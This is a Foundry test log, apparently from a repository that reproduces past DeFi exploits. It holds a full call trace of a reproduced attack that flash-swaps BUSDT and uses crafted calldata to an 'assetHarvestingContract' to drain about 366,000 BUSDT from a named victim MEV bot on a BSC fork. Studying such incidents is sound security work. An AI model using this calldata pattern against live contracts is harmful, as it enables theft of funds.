Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.30s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-11/MEV_0x8c2d_exp.sol:36:26:
   |
36 |     function pancakeCall(address _sender, uint256 _amount0, uint256 _amount1, bytes calldata _data) external {
   |                          ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-11/MEV_0x8c2d_exp.sol:36:61:
   |
36 |     function pancakeCall(address _sender, uint256 _amount0, uint256 _amount1, bytes calldata _data) external {
   |                                                             ^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-11/MEV_0x8c2d_exp.sol:36:79:
   |
36 |     function pancakeCall(address _sender, uint256 _amount0, uint256 _amount1, bytes calldata _data) external {
   |                                                                               ^^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 520.09ms (6.37ms CPU time)

Ran 1 test for src/test/2023-11/MEV_0x8c2d_exp.sol:ContractTest
[PASS] testExploit() (gas: 350199)
Logs:
  Attacker BUSDT balance after exploit: 364956.561650037821071215

Traces:
  [6544] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("bsc", 33435892 [3.343e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(BUSDT: [0x55d398326f99059fF775485246999027B3197955], "BUSDT")
    │   └─ ← [Return]
    ├─ [0] VM::label(WBNB_BUSDT: [0x16b9a82891338f9bA80E2D6970FddA79D1eb0daE], "WBNB_BUSDT")
    │   └─ ← [Return]
    ├─ [0] VM::label(victimMevBot: [0x8C2D4ed92Badb9b65f278EfB8b440F4BC995fFe7], "victimMevBot")
    │   └─ ← [Return]
    ├─ [0] VM::label(assetHarvestingContract: [0x19a23DdAA47396335894229E0439D3D187D89eC9], "assetHarvestingContract")
    │   └─ ← [Return]
    └─ ← [Stop]

  [443014] ContractTest::testExploit()
    ├─ [2531] BUSDT::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 26510000000000000000 [2.651e19]
    ├─ [0] VM::record()
    │   └─ ← [Return]
    ├─ [531] BUSDT::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 26510000000000000000 [2.651e19]
    ├─ [0] VM::accesses(BUSDT: [0x55d398326f99059fF775485246999027B3197955])
    │   └─ ← [Return] [0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96], []
    ├─ [0] VM::load(BUSDT: [0x55d398326f99059fF775485246999027B3197955], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000016fe6708b439b0000
    ├─ [0] VM::load(BUSDT: [0x55d398326f99059fF775485246999027B3197955], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000016fe6708b439b0000
    ├─ [531] BUSDT::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 26510000000000000000 [2.651e19]
    ├─ [0] VM::store(BUSDT: [0x55d398326f99059fF775485246999027B3197955], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   └─ ← [Return]
    ├─ [531] BUSDT::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::store(BUSDT: [0x55d398326f99059fF775485246999027B3197955], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0x0000000000000000000000000000000000000000000000016fe6708b439b0000)
    │   └─ ← [Return]
    ├─ emit SlotFound(who: BUSDT: [0x55d398326f99059fF775485246999027B3197955], fsig: 0x70a08231, keysHash: 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03, slot: 81201235000773904770131445719184449197250777359516868712991521815545917127830 [8.12e76])
    ├─ [0] VM::load(BUSDT: [0x55d398326f99059fF775485246999027B3197955], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000016fe6708b439b0000
    ├─ [0] VM::store(BUSDT: [0x55d398326f99059fF775485246999027B3197955], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   └─ ← [Return]
    ├─ [531] BUSDT::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [2531] BUSDT::balanceOf(victimMevBot: [0x8C2D4ed92Badb9b65f278EfB8b440F4BC995fFe7]) [staticcall]
    │   └─ ← [Return] 366058040206325661577467 [3.66e23]
    ├─ [166183] WBNB_BUSDT::swap(366058040206325661577467 [3.66e23], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x00000000000000000000000019a23ddaa47396335894229e0439d3d187d89ec90000000000000000000000008c2d4ed92badb9b65f278efb8b440f4bc995ffe7)
    │   ├─ [8071] BUSDT::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 366058040206325661577467 [3.66e23])
    │   │   ├─ emit Transfer(from: WBNB_BUSDT: [0x16b9a82891338f9bA80E2D6970FddA79D1eb0daE], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 366058040206325661577467 [3.66e23])
    │   │   ├─  storage changes:
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x000000000000000000000000000000000000000000004d840bcead08e43030fb
    │   │   │   @ 0xba08221f8673e7bcd34c1b8c4689a983ae464d35addf83dda4fe5d5546a79b0d: 0x0000000000000000000000000000000000000000000c5a322684faccbc04855c → 0x0000000000000000000000000000000000000000000c0cae1ab64dc3d7d45461
    │   │   └─ ← [Return] true
    │   ├─ [127167] ContractTest::pancakeCall(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 366058040206325661577467 [3.66e23], 0, 0x00000000000000000000000019a23ddaa47396335894229e0439d3d187d89ec90000000000000000000000008c2d4ed92badb9b65f278efb8b440f4bc995ffe7)
    │   │   ├─ [24562] BUSDT::approve(assetHarvestingContract: [0x19a23DdAA47396335894229E0439D3D187D89eC9], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: assetHarvestingContract: [0x19a23DdAA47396335894229E0439D3D187D89eC9], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x12abe6d8e50cae41b841f138ec7ca16a479568db981a8fdc158f3ae8fcd1da91: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   └─ ← [Return] true
    │   │   ├─ [531] BUSDT::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 366058040206325661577467 [3.66e23]
    │   │   ├─ [57623] assetHarvestingContract::ac3994ec(000000000000000000000000000000000000000000004d840bcead08e43030fb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000065511e8a000000380000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000055d398326f99059ff775485246999027b3197955000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496)
    │   │   │   ├─ [6034] BUSDT::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 366058040206325661577467 [3.66e23])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 366058040206325661577467 [3.66e23])
    │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: assetHarvestingContract: [0x19a23DdAA47396335894229E0439D3D187D89eC9], value: 115792089237316195423570985008687907853269984665640563673399543801587468062468 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x12abe6d8e50cae41b841f138ec7ca16a479568db981a8fdc158f3ae8fcd1da91: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffb27bf43152f71bcfcf04
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─  emit topic 0: 0x0ff585d6d0fcd149f5bf7bb4a6b3ff9a71b716cf33667bb1e58136f88cd7ddba
    │   │   │   │        topic 1: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   │        topic 2: 0x0000000000000000000000000000000065511e8a000000380000000000000000
    │   │   │   │           data: 0x000000000000000000000000000000000000000000004d840bcead08e43030fb00000000000000000000000055d398326f99059ff775485246999027b31979550000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x7e58ffffdc0915f50b0f8d6859210b08db6f5ee9768e3d8d24f322fc4ca9718e: 0 → 0x4195bbc894fe03910b5ab2df98b3d1eefef82e76c0b9245bfbc5e243c655a90a
    │   │   │   │   @ 0x7e58ffffdc0915f50b0f8d6859210b08db6f5ee9768e3d8d24f322fc4ca9718d: 0 → 0x0000000000000000000000017fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   └─ ← [Stop]
    │   │   ├─ [531] BUSDT::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 366058040206325661577467 [3.66e23]
    │   │   ├─ [17371] assetHarvestingContract::1270d364(000000000000000000000000000000000000000000004d840bcead08e43030fb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000065511e8a000000380000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000055d398326f99059ff775485246999027b3197955000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000008c2d4ed92badb9b65f278efb8b440f4bc995ffe70000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000000000000000000000000000000000000000000000)
    │   │   │   ├─ [13634] BUSDT::transferFrom(victimMevBot: [0x8C2D4ed92Badb9b65f278EfB8b440F4BC995fFe7], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 366058040206325661577467 [3.66e23])
    │   │   │   │   ├─ emit Transfer(from: victimMevBot: [0x8C2D4ed92Badb9b65f278EfB8b440F4BC995fFe7], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 366058040206325661577467 [3.66e23])
    │   │   │   │   ├─ emit Approval(owner: victimMevBot: [0x8C2D4ed92Badb9b65f278EfB8b440F4BC995fFe7], spender: assetHarvestingContract: [0x19a23DdAA47396335894229E0439D3D187D89eC9], value: 115792089237316195423570985008687907853269984665640563673399543801587468062468 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x67b3d55ecd6c4f2f3c864a3a30b6d0ec2fc0388bab78b86a6120db11b63f1564: 0x000000000000000000000000000000000000000000004d840bcead08e43030fb → 0
    │   │   │   │   │   @ 0x06fdc3a73e24d94096a5573f85f127189fd0704b16af319f39e887ef3f88fd2f: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffb27bf43152f71bcfcf04
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000004d840bcead08e43030fb → 0x000000000000000000000000000000000000000000009b08179d5a11c86061f6
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x7e58ffffdc0915f50b0f8d6859210b08db6f5ee9768e3d8d24f322fc4ca9718d: 0x0000000000000000000000017fa9385be102ac3eac297483dd6233d62b3e1496 → 0x0000000000000000000000027fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   │   @ 0x06fdc3a73e24d94096a5573f85f127189fd0704b16af319f39e887ef3f88fd2f: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffb27bf43152f71bcfcf04
    │   │   │   └─ ← [Stop]
    │   │   ├─ [2562] BUSDT::approve(assetHarvestingContract: [0x19a23DdAA47396335894229E0439D3D187D89eC9], 0)
    │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: assetHarvestingContract: [0x19a23DdAA47396335894229E0439D3D187D89eC9], value: 0)
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x12abe6d8e50cae41b841f138ec7ca16a479568db981a8fdc158f3ae8fcd1da91: 0xffffffffffffffffffffffffffffffffffffffffffffb27bf43152f71bcfcf04 → 0
    │   │   │   └─ ← [Return] true
    │   │   ├─ [3271] BUSDT::transfer(WBNB_BUSDT: [0x16b9a82891338f9bA80E2D6970FddA79D1eb0daE], 367159518762613502083719 [3.671e23])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: WBNB_BUSDT: [0x16b9a82891338f9bA80E2D6970FddA79D1eb0daE], value: 367159518762613502083719 [3.671e23])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000009b08179d5a11c86061f6 → 0x000000000000000000000000000000000000000000004d4855b8bdf97558df6f
    │   │   │   │   @ 0xba08221f8673e7bcd34c1b8c4689a983ae464d35addf83dda4fe5d5546a79b0d: 0x0000000000000000000000000000000000000000000c0cae1ab64dc3d7d45461 → 0x0000000000000000000000000000000000000000000c5a6ddc9ae9dc2adbd6e8
    │   │   │   └─ ← [Return] true
    │   │   ├─ [531] BUSDT::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 364956561650037821071215 [3.649e23]
    │   │   ├─ [2425] BUSDT::decimals() [staticcall]
    │   │   │   └─ ← [Return] 18
    │   │   ├─ emit log_named_decimal_uint(key: "Attacker BUSDT balance after exploit", val: 364956561650037821071215 [3.649e23], decimals: 18)
    │   │   └─ ← [Stop]
    │   ├─ [531] BUSDT::balanceOf(WBNB_BUSDT: [0x16b9a82891338f9bA80E2D6970FddA79D1eb0daE]) [staticcall]
    │   │   └─ ← [Return] 14934149410212819085547240 [1.493e25]
    │   ├─ [2534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(WBNB_BUSDT: [0x16b9a82891338f9bA80E2D6970FddA79D1eb0daE]) [staticcall]
    │   │   └─ ← [Return] 60136752053422081954155 [6.013e22]
    │   ├─ emit Sync(reserve0: 14934149410212819085547240 [1.493e25], reserve1: 60136752053422081954155 [6.013e22])
    │   ├─ emit Swap(sender: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 367159518762613502083719 [3.671e23], amount1In: 0, amount0Out: 366058040206325661577467 [3.66e23], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─  storage changes:
    │   │   @ 8: 0x65511e89000000000cbc05159e6b6defd16b0000000c5a322684faccbc04855c → 0x65511e89000000000cbc05159e6b6defd16b0000000c5a6ddc9ae9dc2adbd6e8
    │   └─ ← [Stop]
    ├─  storage changes:
    │   @ 0x48daa37823a4a6aaa0950c817e29c013b93b366112361cd04cf01d10b3af430b: 0 → 1
    │   @ 0x48daa37823a4a6aaa0950c817e29c013b93b366112361cd04cf01d10b3af4308: 0 → 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96
    │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000000016fe6708b439b0000 → 0
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 5.00s (3.81s CPU time)

Ran 2 test suites in 6.15s (5.52s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
